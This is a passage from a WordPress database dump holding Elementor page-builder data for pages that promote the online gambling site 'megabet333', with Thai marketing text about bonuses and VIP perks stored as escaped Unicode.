\\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(974,128,'_thumbnail_id','60'),(975,128,'_elementor_edit_mode','builder'),(976,128,'_elementor_template_type','wp-page'),(977,128,'_elementor_version','3.32.5'),(978,128,'_elementor_pro_version','3.32.3'),(979,128,'_wp_page_template','default'),(980,128,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(981,128,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(984,129,'_thumbnail_id','60'),(985,129,'_elementor_edit_mode','builder'),(986,129,'_elementor_template_type','wp-page'),(987,129,'_elementor_version','3.32.5'),(988,129,'_elementor_pro_version','3.32.3'),(989,129,'_wp_page_template','default'),(990,129,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(991,129,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 